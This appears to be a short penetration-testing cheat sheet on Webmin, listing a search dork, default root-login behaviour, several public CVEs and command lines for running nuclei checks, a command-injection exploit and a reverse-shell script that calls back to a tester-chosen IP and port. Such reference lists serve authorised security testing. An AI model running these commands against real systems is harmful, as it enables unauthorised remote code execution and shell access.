a Curated list of Webmin vulnerability for penetration tester
Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more.
http.html:"webmin"
root:unix_root_password You should be able to login as root, using the same password as the root Unix user on your Linux system. However, if you change the Unix root password in future the Webmin root user will not change. This is because the package install just copies the current password from the /etc/shadow file.
http://_your-systems-hostname_:10000/
Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990. Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829) Less privileged Webmin users who do not have any File Manager module restrictions configured can access files with root privileges, if using the default Authentic theme
nuclei -u target.com:1000 -t CVE-2022-0824.yaml -v -V username=username -V password=password
python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command.
nuclei -u target.com:1000 -t CVE-2022-36446.yaml -v -V username=username -V password=password
An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.
python2 CVE_2019_15107.py https://target-ip:10000 cmd